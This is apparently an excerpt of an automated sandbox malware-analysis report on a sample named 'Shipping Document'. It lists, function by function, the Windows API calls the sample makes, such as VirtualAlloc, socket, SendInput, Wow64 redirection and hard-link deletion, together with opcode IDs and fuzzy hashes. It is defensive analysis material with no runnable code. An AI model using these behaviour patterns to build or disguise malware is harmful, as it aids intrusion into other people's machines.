                              Similarity
                              • API ID: MessageSend
                              • String ID: msctls_trackbar32
                              • API String ID: 3850602802-1010561917
                              • Opcode ID: e833233b23bc6e531705403babfbcc486eb81e4c9a51defaba68b415f3747271
                              • Instruction ID: 0466ae7f34f71638ab6eec639d0599b8e46dbd776d1419b05bdc1d220e14d43b
                              • Opcode Fuzzy Hash: e833233b23bc6e531705403babfbcc486eb81e4c9a51defaba68b415f3747271
                              • Instruction Fuzzy Hash: ED11E772250249BBEF219E74CC45FEB77A9EFC9764F02052DF681A6091D272D811CB60
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00FC4C2E), ref: 00FC4CA3
                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FC4CB5
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetNativeSystemInfo$kernel32.dll
                              • API String ID: 2574300362-192647395
                              • Opcode ID: f0d661256bcae0dfa440629162172e32702a917cbf22bf093d790775248fd42a
                              • Instruction ID: 6fb35f3f32efa3f76585b464e19413891f8b6107471eac1f5694cd58b257668e
                              • Opcode Fuzzy Hash: f0d661256bcae0dfa440629162172e32702a917cbf22bf093d790775248fd42a
                              • Instruction Fuzzy Hash: 2FD012B4911723CFD7209F39DBA9A0676D5AF06691B11883D98C5D6520D674D880C750
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00FC4CE1,?), ref: 00FC4DA2
                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FC4DB4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                              • API String ID: 2574300362-1355242751
                              • Opcode ID: 8698d0fd7577dcac371597c01b0be65b7570fb992fd62ba789d8c92c6e9ea9ae
                              • Instruction ID: feee7a2729a405c6e7d75dff812333459acbf2cd9d0865439c09094a755aa006
                              • Opcode Fuzzy Hash: 8698d0fd7577dcac371597c01b0be65b7570fb992fd62ba789d8c92c6e9ea9ae
                              • Instruction Fuzzy Hash: 8FD0C2B4900313CFC7305F35C659B4672D4AF06290B00883DD8C2C6510D774D880C750
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00FC4D2E,?,00FC4F4F,?,010862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FC4D6F
                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FC4D81
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                              • API String ID: 2574300362-3689287502
                              • Opcode ID: c078213387769f5beb3b86b7a13b858620e5cb5b34c8772ecfe7bcf1ebc570fb
                              • Instruction ID: 65b76d246f68a22d3ef8d8678c861e0cb359a0bd9c6fae5bb5b4b2fed352f2d4
                              • Opcode Fuzzy Hash: c078213387769f5beb3b86b7a13b858620e5cb5b34c8772ecfe7bcf1ebc570fb
                              • Instruction Fuzzy Hash: 69D012B4910713CFD7305F35DA59B1676D8BF162A1B11887D98C7D6210D675D880CB90
                              APIs
                              • LoadLibraryA.KERNEL32(advapi32.dll,?,010412C1), ref: 01041080
                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01041092
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: RegDeleteKeyExW$advapi32.dll
                              • API String ID: 2574300362-4033151799
                              • Opcode ID: 32fed3d519d14a058d7725263e5af03ed2e2fb1c4efd2ec83b215aae1e0dc788
                              • Instruction ID: 46f7fcf38d131e309cbfbcfb99c65da4bade0050e1048d88295eef37b68e84b7
                              • Opcode Fuzzy Hash: 32fed3d519d14a058d7725263e5af03ed2e2fb1c4efd2ec83b215aae1e0dc788
                              • Instruction Fuzzy Hash: 19D012F49117138FD7305F39D59895676E4AF05251F118C7DA4C5DA110DAB4D4C0C754
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,01039009,?,0104F910), ref: 01039403
                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 01039415
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetModuleHandleExW$kernel32.dll
                              • API String ID: 2574300362-199464113
                              • Opcode ID: f596ecb23cbd8a9f6a1f7dd6660403c8665e487f8ae949925e8c4fcc38ad6ded
                              • Instruction ID: 11bd44c6b307e17edae3b950c7110997fe3762dbd17d89ab0ed3139333788bf4
                              • Opcode Fuzzy Hash: f596ecb23cbd8a9f6a1f7dd6660403c8665e487f8ae949925e8c4fcc38ad6ded
                              • Instruction Fuzzy Hash: 39D0C2B4900313CFD7204F39C64890776D8AF02241B10C83D94C1C6510DAB4C4C0C750
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: LocalTime__swprintf
                              • String ID: %.3d$WIN_XPe
                              • API String ID: 2070861257-2409531811
                              • Opcode ID: 34844ab1f7fc08c28c37b250e49a640718e191bad41cde71d2c0aceff98b4629
                              • Instruction ID: e1ab5b19105051a4878c21270e96686bd06c71d2419302602a2a271f0a6e911b
                              • Opcode Fuzzy Hash: 34844ab1f7fc08c28c37b250e49a640718e191bad41cde71d2c0aceff98b4629
                              • Instruction Fuzzy Hash: 36D012B6C04519EBDB159A918D89DFD777CAB04301F440592F58692040F379DB849B25
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2b4756d82395062060e7004c1325a9e840668f110db1ec1a84a6a24a208bae8b
                              • Instruction ID: ab3d8b574025ae573560cc5137b8c1cb11098e5a83a213d6e2cf1445f8b1bf36
                              • Opcode Fuzzy Hash: 2b4756d82395062060e7004c1325a9e840668f110db1ec1a84a6a24a208bae8b
                              • Instruction Fuzzy Hash: EBC19075A00216EFDB14CF98C884EAEBBF5FF48310B148598E985EB255D734EE81CB90
                              APIs
                              • CharLowerBuffW.USER32(?,?), ref: 0103E3D2
                              • CharLowerBuffW.USER32(?,?), ref: 0103E415
                                • Part of subcall function 0103DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0103DAD9
                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0103E615
                              • _memmove.LIBCMT ref: 0103E628
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: BuffCharLower$AllocVirtual_memmove
                              • String ID:
                              • API String ID: 3659485706-0
                              • Opcode ID: 09326dce09e49ae6eb4c94c0a0722c41a6df3779928a45750603659b4ea42712
                              • Instruction ID: 10b031150b8e685a1e9a44a37d27d3b048b7a38ab2c18dcebefefeb248c2c51d
                              • Opcode Fuzzy Hash: 09326dce09e49ae6eb4c94c0a0722c41a6df3779928a45750603659b4ea42712
                              • Instruction Fuzzy Hash: C8C16B716083428FC754DF28C480A5ABBE4FF88714F048A6DF8999B351DB75E946CF82
                              APIs
                              • CoInitialize.OLE32(00000000), ref: 010383D8
                              • CoUninitialize.OLE32 ref: 010383E3
                                • Part of subcall function 0101DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0101DAC5
                              • VariantInit.OLEAUT32(?), ref: 010383EE
                              • VariantClear.OLEAUT32(?), ref: 010386BF
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                              • String ID:
                              • API String ID: 780911581-0
                              • Opcode ID: 9874b1169a2d135bd6fcd43d301ee96976ee865f2633107119196f5ff8352ac3
                              • Instruction ID: 93680846187b5d6f475b9540ee4173385e3fdbfc44cad2029073b6b1c59ddb1d
                              • Opcode Fuzzy Hash: 9874b1169a2d135bd6fcd43d301ee96976ee865f2633107119196f5ff8352ac3
                              • Instruction Fuzzy Hash: BFA127752047029FDB10DF19C985F1ABBE8BF88714F05858DFA9A9B3A1CB74E904DB41
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Variant$AllocClearCopyInitString
                              • String ID:
                              • API String ID: 2808897238-0
                              • Opcode ID: 60e5d7c339c1e2406ee92efa516d90a10c36e96d04e2ce7092bee6104f483a02
                              • Instruction ID: 6889224c4cf0f9fd2176a465e536700bb5f7baa0800ede167c9235b020c5caa9
                              • Opcode Fuzzy Hash: 60e5d7c339c1e2406ee92efa516d90a10c36e96d04e2ce7092bee6104f483a02
                              • Instruction Fuzzy Hash: 8C51B134604303DADB60AF69D895B6EB7E5AF48310F50881FF6D6CB295DFB9D8808B11
                              APIs
                                • Part of subcall function 00FC5045: _fseek.LIBCMT ref: 00FC505D
                                • Part of subcall function 010299BE: _wcscmp.LIBCMT ref: 01029AAE
                                • Part of subcall function 010299BE: _wcscmp.LIBCMT ref: 01029AC1
                              • _free.LIBCMT ref: 0102992C
                              • _free.LIBCMT ref: 01029933
                              • _free.LIBCMT ref: 0102999E
                                • Part of subcall function 00FE2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00FE9C64), ref: 00FE2FA9
                                • Part of subcall function 00FE2F95: GetLastError.KERNEL32(00000000,?,00FE9C64), ref: 00FE2FBB
                              • _free.LIBCMT ref: 010299A6
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                              • String ID:
                              • API String ID: 1552873950-0
                              • Opcode ID: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
                              • Instruction ID: 67db03b5e7cc8cf04c06ad7dab76d941683f5e4a7cf60b32a82b1c797136cfbf
                              • Opcode Fuzzy Hash: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
                              • Instruction Fuzzy Hash: A55183B1E04269AFDF249F64CC81B9EBBB9EF48314F00009EF649A7241DB755980CF58
                              APIs
                              • GetWindowRect.USER32(011DEA70,?), ref: 01049AD2
                              • ScreenToClient.USER32(00000002,00000002), ref: 01049B05
                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01049B72
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$ClientMoveRectScreen
                              • String ID:
                              • API String ID: 3880355969-0
                              • Opcode ID: 7da11f49b51042fe1384832e9deeb1fb553262301ae9277c6524d9eedd779cc8
                              • Instruction ID: 82f8fa730de6b68f64ede41c6603f9c9230b1fffd1a5d614f6ccf0d70a1d8948
                              • Opcode Fuzzy Hash: 7da11f49b51042fe1384832e9deeb1fb553262301ae9277c6524d9eedd779cc8
                              • Instruction Fuzzy Hash: B95141B4900209EFDF21DF58D9C0AAE7BF5FB48324F1082B9F99597291D731A951CB90
                              APIs
                              • socket.WSOCK32(00000002,00000002,00000011), ref: 01036CE4
                              • WSAGetLastError.WSOCK32(00000000), ref: 01036CF4
                                • Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
                                • Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C
                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01036D58
                              • WSAGetLastError.WSOCK32(00000000), ref: 01036D64
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ErrorLast$__itow__swprintfsocket
                              • String ID:
                              • API String ID: 2214342067-0
                              • Opcode ID: 05e5714e24a240ab1e0b166f3b3205aa4122b7858d2c75b2a4e95ff3b2437f32
                              • Instruction ID: a6f320c4353b3f2ccc1c3df6dabf32d8c08c7545c258500df031fd3d3b7e9b4f
                              • Opcode Fuzzy Hash: 05e5714e24a240ab1e0b166f3b3205aa4122b7858d2c75b2a4e95ff3b2437f32
                              • Instruction Fuzzy Hash: B041D774740201AFEB20AF28DD8BF7A77E99F44B10F44805CFA599F2C2DAB99D019751
                              APIs
                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0104F910), ref: 010367BA
                              • _strlen.LIBCMT ref: 010367EC
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID:
                              • API String ID: 4218353326-0
                              • Opcode ID: 02a021942562384891df4dd9385be042f7228bd4fd21bb78eb8a06445481db8f
                              • Instruction ID: dc7f5cd165432c3ddc25d1df999d20baf6666e0f76eafa5fb64519618fc33618
                              • Opcode Fuzzy Hash: 02a021942562384891df4dd9385be042f7228bd4fd21bb78eb8a06445481db8f
                              • Instruction Fuzzy Hash: BE41F575A00106BFCB14EB69CDC5FAEB3ADAF88310F048259F9559B292DF75AE40C750
                              APIs
                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0102BB09
                              • GetLastError.KERNEL32(?,00000000), ref: 0102BB2F
                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0102BB54
                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0102BB80
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CreateHardLink$DeleteErrorFileLast
                              • String ID:
                              • API String ID: 3321077145-0
                              • Opcode ID: ce016cb6b8042d43590f06e2bb33911600066714f917efbbe22262e54051c879
                              • Instruction ID: afd9652f320171d933728f28fd46b59fe72a64cd03834cf282d123965fe78b7f
                              • Opcode Fuzzy Hash: ce016cb6b8042d43590f06e2bb33911600066714f917efbbe22262e54051c879
                              • Instruction Fuzzy Hash: BB415139200512DFCB21DF19C689E5DBBE1EF49710B058488ED8A9B762CB78FD01DB91
                              APIs
                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 01048B4D
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: InvalidateRect
                              • String ID:
                              • API String ID: 634782764-0
                              • Opcode ID: 261b271e898dbf09b28aa8ccb98e8fcb67afd164636a68053f98342f80e506fc
                              • Instruction ID: 608d71346bbbf1fe6cec0a6d0f9813e27151ca43d0826d4c6095228009aafbb3
                              • Opcode Fuzzy Hash: 261b271e898dbf09b28aa8ccb98e8fcb67afd164636a68053f98342f80e506fc
                              • Instruction Fuzzy Hash: E131ADF4644204BFEB619AACCCC5FAD3BA4EB09320F14CE67FBD1D6291C635A5508B81
                              APIs
                              • ClientToScreen.USER32(?,?), ref: 0104AE1A
                              • GetWindowRect.USER32(?,?), ref: 0104AE90
                              • PtInRect.USER32(?,?,0104C304), ref: 0104AEA0
                              • MessageBeep.USER32(00000000), ref: 0104AF11
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Rect$BeepClientMessageScreenWindow
                              • String ID:
                              • API String ID: 1352109105-0
                              • Opcode ID: 37850da33febc5705a94ef436f28bcf04d8703b137bd9dc29b9cc02beb331964
                              • Instruction ID: 5826e397cb91ded9249cb000bb3de181fa81306bcb7e796822418bc5b6faa7da
                              • Opcode Fuzzy Hash: 37850da33febc5705a94ef436f28bcf04d8703b137bd9dc29b9cc02beb331964
                              • Instruction Fuzzy Hash: AB418FB4744106DFDB21CF59C4C4A9D7BF5FB49340F1581B9E9AA8B245D732A842CB50
                              APIs
                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 01021037
                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 01021053
                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 010210B9
                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0102110B
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: KeyboardState$InputMessagePostSend
                              • String ID:
                              • API String ID: 432972143-0
                              • Opcode ID: 5ba0c45b57ec68edc783a07b3784a9fa5d12b00dfa8ee093e75ac9168666320f
                              • Instruction ID: 073ae2490bf451b3f6e038e2d8b4efc3aa535aa49a140c459befc02a0e3f04a4
                              • Opcode Fuzzy Hash: 5ba0c45b57ec68edc783a07b3784a9fa5d12b00dfa8ee093e75ac9168666320f
                              • Instruction Fuzzy Hash: 8F313970F446A8AEFB318A6D8C44BFEBBE9AF44310F04435AF6C0521D1C3BD45818791
                              APIs
